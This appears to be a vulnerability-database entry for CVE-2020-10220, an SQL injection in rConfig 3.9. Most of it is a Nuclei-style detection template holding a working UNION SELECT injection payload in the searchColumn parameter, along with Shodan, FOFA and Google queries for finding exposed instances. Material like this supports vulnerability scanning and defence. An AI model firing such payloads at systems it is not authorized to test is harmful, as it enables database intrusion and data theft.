CVE-2020-10220: rConfig 3.9 - SQL Injection

日期: 2025-08-01 | 影响软件: rConfig 3.9 | POC: 已公开

漏洞描述

An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter.

PoC代码[已公开]

id: CVE-2020-10220

info:
  name: rConfig 3.9 - SQL Injection
  author: ritikchaddha,theamanrawat
  severity: critical
  description: |
    An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
  remediation: |
    Upgrade to a patched version of rConfig or apply the vendor-supplied patch to mitigate this vulnerability.
  reference:
    - http://packetstormsecurity.com/files/156950/rConfig-3.9.4-searchField-Remote-Code-Execution.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-10220
    - http://packetstormsecurity.com/files/156688/rConfig-3.9-SQL-Injection.html
    - http://packetstormsecurity.com/files/156766/Rconfig-3.x-Chained-Remote-Code-Execution.html
    - https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-10220
    cwe-id: CWE-89
    epss-score: 0.94024
    epss-percentile: 0.9989
    cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: rconfig
    product: rconfig
    shodan-query:
      - title:"rConfig"
      - http.title:"rconfig"
    fofa-query: title="rconfig"
    google-query: intitle:"rconfig"
  tags: cve,cve2020,packetstorm,rconfig,sqli
variables:
  num: "999999999"

http:
  - method: GET
    path:
      - "{{BaseURL}}/commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('{{num}}'),0x5B50574E5D3C42523E)%20limit%200,1),NULL--"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{md5(num)}}"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d7ca2f0a24748ce090e5a5d2810adfcbd7bc1a2f9f0c590b41eb0720e6aff1b7022066efdf050aff5e00aece7762716695a0382e6b2384bf54b7312b46a17dce152e:922c64590222798bb761d5b6d8e72950

相关漏洞推荐